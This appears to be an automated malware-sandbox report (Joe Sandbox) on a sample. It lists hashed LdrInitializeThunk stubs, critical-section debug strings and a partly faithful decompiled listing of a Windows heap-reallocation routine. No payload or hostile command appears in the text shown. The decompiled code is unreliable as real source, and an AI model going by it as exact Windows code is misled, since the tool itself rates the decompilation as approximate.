Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 36B22EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22EBA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f8f05fcd21e301ce97e3c8d288a8aafdc40578e2a48979c2018bd9233e80c9b
Instruction ID: 9789f4deca7b07e973c12a37a281c638dc27ebadbf78b272c350e165a524441d
Opcode Fuzzy Hash: 6f8f05fcd21e301ce97e3c8d288a8aafdc40578e2a48979c2018bd9233e80c9b
Instruction Fuzzy Hash: D390023130240402D5006158492470B100547D0302F61C416A2154515DD63588557972

Uniqueness

Uniqueness Score: -1.00%

Function 36B22ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22EDA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a5e6c2a74ba3d0391d3b62062409a7f5dbe4ec4ab12ae2dca3b7454de747068
Instruction ID: 37585b0f5e117df481ddc769ca19e803be3404641a120f91895ad7cb18f26ca9
Opcode Fuzzy Hash: 5a5e6c2a74ba3d0391d3b62062409a7f5dbe4ec4ab12ae2dca3b7454de747068
Instruction Fuzzy Hash: 029002317020004245407168895490650056BE1211761C526A1988510DD56988696A66

Uniqueness

Uniqueness Score: -1.00%

Function 36B22E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22E5A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b854a290300dc57274fcbd9231b9194ac0b059411d39f902dfd673164803c54
Instruction ID: b9db97dade57f63e1a806febda9bc1f4fd0ec73c0618b58bcc14d03f87e2ebe5
Opcode Fuzzy Hash: 5b854a290300dc57274fcbd9231b9194ac0b059411d39f902dfd673164803c54
Instruction Fuzzy Hash: 3290027134200442D50061584524B06100587E1301F61C41AE2054514DD629CC567527

Uniqueness

Uniqueness Score: -1.00%

Function 36B22F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22F0A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07125a6a0a6f2a97ad6e31a45af3b1a6794f79830b3c668bd22bc5178425a114
Instruction ID: 41da35a041ec84c7c2dae9c51bc1d399f75f8248c4bad7bc0e18f46c78a7d21e
Opcode Fuzzy Hash: 07125a6a0a6f2a97ad6e31a45af3b1a6794f79830b3c668bd22bc5178425a114
Instruction Fuzzy Hash: ED90023131280042D60065684D24B07100547D0303F61C51AA1144514CD92588656922

Uniqueness

Uniqueness Score: -1.00%

Function 36B22CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22CFA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbf6aeaf6b452172f649de534bcf92250842360717507c6660e2a49d56ccb6a0
Instruction ID: 429e193df4ab13471f8baa532cbc823e61edfafb40ea6f8393ccb622b2e7aeec
Opcode Fuzzy Hash: dbf6aeaf6b452172f649de534bcf92250842360717507c6660e2a49d56ccb6a0
Instruction Fuzzy Hash: 83900231343041525945B1584514507500657E02417A1C417A2404910CD536985AEA22

Uniqueness

Uniqueness Score: -1.00%

Function 36B22C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22C3A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8f199e72e7cf91f78fc7f3422f28253aa512170e53c55a0e27ced3c4ec8cbc7
Instruction ID: 7523d5d11045e6228088d2d928d268ece25daaeec9c1eba520d8b066c67b8e8b
Opcode Fuzzy Hash: c8f199e72e7cf91f78fc7f3422f28253aa512170e53c55a0e27ced3c4ec8cbc7
Instruction Fuzzy Hash: A090023931300002D5807158551860A100547D1202FA1D81AA1005518CD925886D6722

Uniqueness

Uniqueness Score: -1.00%

Function 36B22C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22C5A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6e445ae0df584d82f65515b5f590ef239dab1f97a8f0ac43b4049a5a73a48f8
Instruction ID: 2675bab91f0c24c745015de175e0f84ba75191888b11505d3929848f168d1dc6
Opcode Fuzzy Hash: d6e445ae0df584d82f65515b5f590ef239dab1f97a8f0ac43b4049a5a73a48f8
Instruction Fuzzy Hash: CD90023130200003D54071585528606500597E1301F61D416E1404514CE925885A6623

Uniqueness

Uniqueness Score: -1.00%

Function 36B22DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22DAA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5dbb512de7fc643f7c0558ce938db124651a1db31069ba2f48ed13055e1d2d4b
Instruction ID: 6a63f3de97acebc2da6f0b4f5b84ecec56a85f064ea0b9bd2e8f78b3e0ef74f5
Opcode Fuzzy Hash: 5dbb512de7fc643f7c0558ce938db124651a1db31069ba2f48ed13055e1d2d4b
Instruction Fuzzy Hash: B890023170200502D50171584514616100A47D0241FA1C427A2014515EDA358996B532

Uniqueness

Uniqueness Score: -1.00%

Function 36B22DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22DCA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28c7ba0a1d3c4467a82f1e128fe11f251693d10a7eccbad79db5c7d69a65619a
Instruction ID: f8bbd09b5e9b5fbdca34771b1ac7b53a8891be6e7c4b60f23f4ee5e880ca8ca9
Opcode Fuzzy Hash: 28c7ba0a1d3c4467a82f1e128fe11f251693d10a7eccbad79db5c7d69a65619a
Instruction Fuzzy Hash: CE90027130200402D54071584514746100547D0301F61C416A6054514ED6698DD97A66

Uniqueness

Uniqueness Score: -1.00%

Function 36B22D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22D1A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
Instruction ID: 8863a6458c9e0d21ed14b21645b50799aa108ab08e4e8f8b9635749dcca94e38
Opcode Fuzzy Hash: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
Instruction Fuzzy Hash: DE90023130200413D51161584614707100947D0241FA1C817A1414518DE6668956B522

Uniqueness

Uniqueness Score: -1.00%

Function 36B22A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22A8A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1531ddc45933e586c5deb8862059625f0bf33e66fd02eb9058eb1fab32fb5224
Instruction ID: e005601a5a4da2b060698beb80eeb37b6b78ab8e4effa4c8b31f3a73e2477bb7
Opcode Fuzzy Hash: 1531ddc45933e586c5deb8862059625f0bf33e66fd02eb9058eb1fab32fb5224
Instruction Fuzzy Hash: 4D90027130300003450571584524616500A47E0201B61C426E2004550DD53588957526

Uniqueness

Uniqueness Score: -1.00%

Function 36B22B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22B9A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
Instruction ID: 23a5ce3c4dc7bdecbe16454c99b084cde61476fd32786499411139387f8bc1b8
Opcode Fuzzy Hash: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
Instruction Fuzzy Hash: AE90023130208802D5106158851474A100547D0301F65C816A5414618DD6A588957522

Uniqueness

Uniqueness Score: -1.00%

Function 36B22BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22BCA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a7d7dc12274b1e00fa9b86540712be1221cb598d1d8eee602626e656df784a5
Instruction ID: f4f0c9325686af6714e2fb1d8595999329718e340519dd55e96049fe7483d89b
Opcode Fuzzy Hash: 4a7d7dc12274b1e00fa9b86540712be1221cb598d1d8eee602626e656df784a5
Instruction Fuzzy Hash: 9790023130200402D50065985518646100547E0301F61D416A6014515ED67588957532

Uniqueness

Uniqueness Score: -1.00%

Function 36B22B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B22B1A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b1209f36f8ae6e1f03633498926eb16db3fead2910446ce36dd9a61ac9bfc5e1
Instruction ID: 69c2034a68ae9c107ad9c6e671ba57e8d1b4342f456c50bd4f6a4dff9227d6cd
Opcode Fuzzy Hash: b1209f36f8ae6e1f03633498926eb16db3fead2910446ce36dd9a61ac9bfc5e1
Instruction Fuzzy Hash: 6990023130200802D5807158451464A100547D1301FA1C41AA1015614DDA258A5D7BA2

Uniqueness

Uniqueness Score: -1.00%

Function 36B229F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 36B229FA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 424f1a986140850f57b53f14f9e95baad234693a5c7650d1854f3a93c93f7691
Instruction ID: 5bb90bf559554d488ca3cadf48d455cb1eb90fd7e8f206d4de4d6693bd88fb79
Opcode Fuzzy Hash: 424f1a986140850f57b53f14f9e95baad234693a5c7650d1854f3a93c93f7691
Instruction Fuzzy Hash: B7900435313000030505F55C0714507104747D5351371C437F3005510CF731CC757533

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 36B18540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 36B5534E
Invalid debug info address of this critical section, xrefs: 36B552C1
double initialized or corrupted critical section, xrefs: 36B55313
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36B552ED
8, xrefs: 36B550EE
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36B55215, 36B552A1, 36B55324
Critical section debug info address, xrefs: 36B5522A, 36B55339
Critical section address., xrefs: 36B5530D
Critical section address, xrefs: 36B55230, 36B552C7, 36B5533F
corrupted critical section, xrefs: 36B552CD
Thread identifier, xrefs: 36B55345
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36B552D9
Address of the debug info found in the active list., xrefs: 36B552B9, 36B55305
undeleted critical section in freed memory, xrefs: 36B55236

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 6c19ff50fdb8df38f249f71f16bb78045024101762cf25f018e1986c8fe88df4
Instruction ID: 0d51dcd74f574e3019686f6e9cf57f496e9774d956bb9160f40151d10f651abb
Opcode Fuzzy Hash: 6c19ff50fdb8df38f249f71f16bb78045024101762cf25f018e1986c8fe88df4
Instruction Fuzzy Hash: 50818BB1D01328AFEB50CF95C940B9EBFB9FB48714F21415AEA05B7240C779A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 36B8FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E36B8FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push("true");
				_push(0x36bbd430);
				E36B37BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E36AD7662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E36B902E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E36ADB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E36AEFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E36B90835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E36AD753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x36bd47c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x36bd47cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x36bd47ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E36ADB910();
							} else {
								E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E36B8823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E36ADB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x36bd47a1 = 1;
								 *0x36bd4100 = 0;
								asm("int3");
								 *0x36bd47a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E36ADB910("Just reallocated block at %p to %Ix bytes\n",  *0x36bd47c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x36bd47c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E36AF2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E36B9D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E36B13AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E36B0FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E36B90D24(_t281);
								__eflags = 0;
								E36B90835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x36bd47cc;
							if( *0x36bd47cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E36B9D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E36B13AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x36bd47cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
